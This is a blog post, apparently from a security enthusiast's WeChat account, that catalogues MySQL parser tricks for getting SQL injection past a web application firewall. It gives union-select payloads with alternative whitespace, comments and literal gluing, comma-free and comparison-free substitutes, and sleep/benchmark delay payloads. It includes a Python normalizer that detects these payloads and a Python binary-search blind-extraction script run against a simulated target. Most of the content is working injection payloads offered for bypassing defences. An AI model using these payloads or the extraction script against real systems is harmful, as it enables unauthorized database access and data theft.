0x01 Background

An exploration of MySQL parser features, specifically the ones that can be used to get an injection past a WAF.

0x02 Tests

Base statement, with the five separator positions examined below marked [1] to [5]:

SELECT * FROM admin WHERE username = 1[1]union[2]select[3]1,user()[4]from[5]admin

Position 1: between the parameter value and union

(1) Common forms: %20, /**/, /*!50000union*/ and similar:

SELECT * FROM admin WHERE username = 1 union select 1,user() from admin

Other forms: %1%20, %39%20, %40%20

(2) Whitespace characters such as %0a:

MySQL accepts the following characters as whitespace: %09, %0A, %0B, %0C, %0D, %20, %A0.

id=1%0aunion select 1,user() from admin

%23%0a (a # line comment closed by a newline) also works as the separator here.

(3) Floating-point form, e.g. 1.1: the number ends at the last digit or dot, so the keyword can follow directly:

SELECT * FROM admin WHERE username = 1.0union select 1,user() from admin

SELECT * FROM admin WHERE username = 1.union select 1,user() from admin

Other formats: %1%2e, %2%2E

(4) Exponent form, 1E0:

SELECT * FROM admin WHERE username = 1E0union select 1,user() from admin

(5) \N form (\N is the NULL literal, so \Nunion is read as NULL followed by union):

SELECT * FROM admin WHERE username = \Nunion select 1,user() from admin

Position 2: between union and select

(1) Whitespace characters

Any of the MySQL whitespace characters listed under Position 1 can be used here.

id=1 union%a0select 1,user() from admin

%23%0a (a # line comment closed by a newline) also works as the separator here.

(2) Comments

An inline comment can stand in for the whitespace:

/**/

/*anything*/

(3) Parentheses

SELECT * FROM admin WHERE username = 1 union(SELECT 1,user() FROM admin limit 0,1)

select * from admin union(select 'test',(select 'asd'),(select user() from users limit 0,1))

Position 3: between select and the selected expressions

(1) Whitespace characters

Any of the MySQL whitespace characters listed under Position 1 can be used here.

id=1 union select%091,user() from admin

%23%0a (a # line comment closed by a newline) also works as the separator here.

(2) Comments

An inline comment can stand in for the whitespace:

/**/

/*anything*/

(3) Other characters

Unary operators and other single characters that may directly precede an expression:

%21  !  exclamation mark

%2B  +  plus sign

%2D  -  minus sign

%40  @  at sign (user variable)

%7E  ~  tilde

SELECT * FROM admin WHERE username = 1 union select~1,user() from admin 

(4) Other forms:

SELECT * FROM admin WHERE username = 1 union SELECT (1),user() FROM admin

SELECT * FROM admin WHERE username = 1 union /*!12345select*/1,user() from admin

SELECT * FROM admin WHERE username = 1 union SELECT @'1',user() FROM admin

SELECT * FROM admin WHERE username = 1 union SELECT {x 1},user() FROM admin

SELECT * FROM admin WHERE username = 1 union SELECT "1",user() FROM admin

\N form: SELECT * FROM admin WHERE username = 1 union SELECT \N,user() FROM admin

Position 4: between the selected expressions and from

(1) Whitespace characters

Any of the MySQL whitespace characters listed under Position 1 can be used here.

id=1 union select 1,user()%09from admin

%23%0a (a # line comment closed by a newline) also works as the separator here.

(2) Comments

An inline comment can stand in for the whitespace:

/**/

/*anything*/

(3) Other symbols

Backtick %60 (the closing backtick of a quoted identifier or alias can touch FROM): SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT `schema_name`FROM information_schema.SCHEMATA limit 0,1))

SELECT * FROM admin WHERE username = 1 union select 1,user()`b`from admin

Version comment (no version number needed, the body is executed): SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT /*!schema_name*/from information_schema.SCHEMATA limit 1,1))

Braces: SELECT * FROM admin WHERE username = 1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1,1))

Parentheses: SELECT * FROM admin WHERE username = 1 union(SELECT 1,(SELECT (schema_name)FROM information_schema.SCHEMATA limit 1,1))

Alias forms (an alias in quotes or a bare word can separate the expression from FROM): SELECT * FROM admin WHERE username = 1 union SELECT 1,user()"" FROM admin

SELECT * FROM admin WHERE username = 1 union SELECT 1,user()A FROM admin

SELECT * FROM admin WHERE username = 1 union SELECT 1,user()'b'from admin

(4) Floating-point, 1E0 and \N forms (the literal ends where the keyword starts, so no separator is needed):

id=1 union%0cselect user(),2.0from admin

SELECT * FROM admin WHERE username = 1 union SELECT user(),2.0FROM admin

SELECT * FROM admin WHERE username = 1 union select user(),8e0from admin

SELECT * FROM admin WHERE username = 1 union select user(),\Nfrom admin

       

Position 5: between from and the table name

(1) Whitespace characters

Any of the MySQL whitespace characters listed under Position 1 can be used here.

id=1 union select 1,user() from%09admin

%23%0a (a # line comment closed by a newline) also works as the separator here.

(2) Comments

An inline comment can stand in for the whitespace:

/**/

/*anything*/

(3) Other characters

Backticks around the schema name: id=1 union select 1,(select(schema_name)from `information_schema`.SCHEMATA limit 0,1)

Version comment: id=1 union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1)

Braces: id=1 union select 1,(select(schema_name)from{x information_schema.schemata} limit 0,1)

Parentheses: id=1 union select 1,(select(schema_name)from(information_schema.schemata) limit 0,1)

When the union reads from the same table, a mix of upper- and lower-case letters and digits is accepted at this position:

SELECT * FROM admin WHERE username = 1 union select 1,user() from123asdadmin

 

Summary: the separators that work at every position are %23%0A and %2d%2D%0A (a # or -- line comment closed by a newline) and %0A itself.
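To see why these separators slip past a pattern match, and what a detection rule has to do about it, here is an added example (not code from the original post). It URL-decodes each payload, strips comments the way the MySQL lexer does (an ordinary /*...*/ becomes a separator, the body of a /*!...*/ version comment is kept, # and -- comments run to the end of the line, and the seven whitespace bytes above all count as whitespace), re-tokenizes the result, and runs one rule on the raw input and another on the normalized token stream. The payload list, the NAIVE_RULE regex, the CANON_RULES and the simplified lexer model are all constructed for this example and are not a complete model of MySQL's lexer.

```python
import re
from urllib.parse import unquote

# Whitespace the MySQL lexer accepts between tokens, as listed on the page:
# %09 %0A %0B %0C %0D %20 %A0.
MYSQL_WS = "\t\n\x0b\x0c\r \xa0"

# A naive, byte-oriented WAF rule of the kind these payloads are written to
# evade: it only recognises "union" and "select" separated by ASCII whitespace.
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.IGNORECASE | re.ASCII)

# Rules applied to the normalized (single-space separated, lower-cased) token stream.
CANON_RULES = {
    "union-select": re.compile(r"\bunion (?:\( )?select\b"),
    "time-delay":   re.compile(r"\b(?:sleep|benchmark) \("),
}

def strip_comments(sql: str) -> str:
    """Rewrite comments the way the MySQL lexer treats them: /*...*/ is a
    separator, /*!nnnnn body*/ keeps its body (MySQL executes it), '#...' and
    '-- ...' run to end of line, and every MYSQL_WS character becomes a plain
    space. Quoted strings and backtick identifiers are copied through."""
    out, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c in "'\"`":                                   # quoted literal / identifier
            j = sql.find(c, i + 1)
            j = n - 1 if j == -1 else j
            out.append(sql[i:j + 1]); i = j + 1
        elif sql.startswith("/*!", i):                    # version comment: body is live SQL
            j = i + 3
            while j < n and sql[j].isdigit():             # optional version number
                j += 1
            end = sql.find("*/", j)
            end = n if end == -1 else end
            out.append(" " + sql[j:end] + " "); i = end + 2
        elif sql.startswith("/*", i):                     # ordinary comment
            end = sql.find("*/", i + 2)
            end = n if end == -1 else end
            out.append(" "); i = end + 2
        elif c == "#" or (sql.startswith("--", i) and
                          (i + 2 >= n or sql[i + 2] in MYSQL_WS or ord(sql[i + 2]) < 32)):
            end = sql.find("\n", i)                       # line comment to end of line
            end = n if end == -1 else end
            out.append(" "); i = end + 1
        elif c in MYSQL_WS:
            out.append(" "); i += 1
        else:
            out.append(c); i += 1
    return "".join(out)

TOKEN = re.compile(r"""
      \\N                                            # NULL literal
    | \d+\.\d*(?:[eE]\d+)? | \.\d+(?:[eE]\d+)?       # 1.0  1.  .5
    | \d+[eE]\d+ | \d+                               # 1E0  8e0  1
    | [A-Za-z_][A-Za-z0-9_]*                         # keywords / identifiers
    | '[^']*' | "[^"]*" | `[^`]*`                    # quoted literals / identifiers
    | \S                                             # any other single character
""", re.VERBOSE)

def canonical(raw: str) -> str:
    """URL-decode (latin-1 so %A0 survives), strip comments, tokenize, and
    re-join the lower-cased tokens with single spaces."""
    sql = strip_comments(unquote(raw, encoding="latin-1"))
    return " ".join(t.lower() for t in TOKEN.findall(sql))

def naive_match(raw: str) -> bool:
    """What the byte-oriented rule sees: the decoded input, nothing else."""
    return NAIVE_RULE.search(unquote(raw, encoding="latin-1")) is not None

def normalized_match(raw: str) -> set:
    """Names of the canonical rules that fire on the normalized token stream."""
    canon = canonical(raw)
    return {name for name, rx in CANON_RULES.items() if rx.search(canon)}

# Constructed payloads, one per technique from the page (parameter value only).
PAYLOADS = {
    "plain":             "1%20union%20select%201,user()%20from%20admin",
    "inline comments":   "1/**/union/**/select/**/1,user()/**/from/**/admin",
    "version comments":  "1/*!50000union*//*!12345select*/1,user()%20from%20admin",
    "hash comment+LF":   "1%23%0aunion%23%0aselect%201,user()%20from%20admin",
    "dash comment+LF":   "1%20union%2d%2d%0aselect%201,user()%20from%20admin",
    "float/1E0 glue":    "1.0union%20select%20user(),8e0from%20admin",
    "NULL literal glue": "\\Nunion%20select%20\\N,user()%20from%20admin",
    "parentheses":       "1%20union(select%201,user()%20from%20admin)",
    "%A0 + tilde":       "1%a0union%a0select~1,user()%a0from%a0admin",
    "split sleep()":     "1%20xor%20sleep%23%0a(5)",
}

if __name__ == "__main__":
    for name, raw in PAYLOADS.items():
        print(f"{name:18} naive={naive_match(raw)!s:5} normalized={sorted(normalized_match(raw))}")
        print(f"{'':18} -> {canonical(raw)}")
```

Only the plain payload trips the naive rule; every payload, including the split sleep#\n(5) call, is caught once the input is tokenized the way the database will tokenize it. The detection-side lesson is to normalize before matching; the application-side fix is still parameterized queries, which no separator trick can get around.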

0x03 Functions

1. Commonly filtered functions and their substitutes

(1) Substring functions (each of these returns the first character of version()):

mid(version(),1,1)

substr(version(),1,1)

substring(version(),1,1)

lpad(version(),1,1)

rpad(version(),1,1)

left(version(),1)

reverse(right(reverse(version()),1))

(2) String concatenation and encoding functions

concat(version(),'|',user())

concat_ws('|',1,2,3)

char(49)  hex('a')  unhex(61)

 

2. Filtered special characters (the comma, for example)

(1) Comma in limit: limit 1 offset 0

(2) Comma in substring functions: mid(version() from 1 for 1)

(3) Comma in the union column list: replace it with a join of single-column subqueries.

SELECT * FROM admin WHERE username = 1 union select * from (select 1)a join(select{x schema_name} from information_schema.SCHEMATA limit 1,1)b

(4) Comparison operators (<, >) filtered

select * from users where id=1 and ascii(substr(database(),1,1))>64

If the comparison operator is filtered and the statement above cannot be used, greatest() can replace it. greatest(n1,n2,...) returns the largest of its arguments, so greatest(x,64)=64 is true exactly when x<=64; the blind-injection oracle becomes an equality test instead of a comparison. Note that MySQL substring positions are 1-based: substr(database(),0,1) returns an empty string, and ascii('') is 0.

select * from users where id=1 and greatest(ascii(substr(database(),1,1)),64)=64
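The comparison-free oracle above, carried through to a full extraction as an added example (not the author's code): mid(... from ... for ...) takes the place of the comma form of mid(), greatest(ascii(x),b)=b takes the place of ascii(x)<=b, and a binary search over the ASCII range recovers each character in seven requests. The target is simulated: DB_NAME is a constructed stand-in for what database() returns, simulated_oracle evaluates the condition with MySQL semantics instead of sending an HTTP request, and the 1-based position rule noted above is what terminates the loop. A real oracle would send build_payload(pos, bound) in the injectable parameter and compare the responses.

```python
# Constructed stand-in for the value database() would return on the target.
DB_NAME = "bypass_db"

def mysql_mid(s: str, pos: int, length: int = 1) -> str:
    """MySQL MID()/SUBSTR() semantics: positions are 1-based; position 0 or a
    position past the end yields '' (and ASCII('') is 0)."""
    if pos <= 0 or pos > len(s):
        return ""
    return s[pos - 1:pos - 1 + length]

def build_payload(pos: int, bound: int) -> str:
    """The boolean condition appended to the injectable parameter.
    mid(... from ... for ...) avoids the commas of mid(s,p,l);
    greatest(x,b)=b replaces x<=b (greatest itself still needs one comma)."""
    return f"1 and greatest(ascii(mid(database() from {pos} for 1)),{bound})={bound}"

def simulated_oracle(pos: int, bound: int) -> bool:
    """Evaluate build_payload(pos, bound) as MySQL would against DB_NAME."""
    ch = mysql_mid(DB_NAME, pos)
    code = ord(ch) if ch else 0
    return max(code, bound) == bound          # greatest(code,bound)=bound <=> code<=bound

def extract(oracle, max_len: int = 64):
    """Recover the string one character at a time with a binary search over
    ASCII 0..127 using only the <= test. Returns (value, payloads_sent)."""
    recovered, sent = [], []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                        # smallest bound with code<=bound, i.e. code itself
            mid = (lo + hi) // 2
            sent.append(build_payload(pos, mid))
            if oracle(pos, mid):
                hi = mid
            else:
                lo = mid + 1
        if lo == 0:                           # ascii('') == 0: we ran past the end
            break
        recovered.append(chr(lo))
    return "".join(recovered), sent

if __name__ == "__main__":
    value, payloads = extract(simulated_oracle)
    print(f"recovered {value!r} with {len(payloads)} requests")
    print("first payload:", payloads[0])
```

The search stops on ascii('')=0 rather than on a fixed length, which is why starting the position at 0 instead of 1 would return nothing at all: position 0 already yields the empty string.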

 

3. Splitting a function name from its argument list

(1) sleep(5) / benchmark(10000000,SHA1(1))

id=1 xor sleep%23%0a(5)

id=1 xor sleep%2d%2d%0a(5)

id=1 xor sleep(%205)

id=1 xor benchmark%0a(10000000,SHA1(1))

 

id=1 xor sleep[whitespace](5), where [whitespace] is any of the MySQL whitespace characters listed under Position 1.

4. The select {x 1} form

select {x[filler]1}, where [filler] can be any of the MySQL whitespace characters listed under Position 1, or one of:

%21  !

%2B  +

%2D  -

%40  @

%7E  ~

 

 

Continuously updated...

 

About me: a network security enthusiast dedicated to sharing original, practical content. Follow my WeChat public account, Bypass--, for more articles.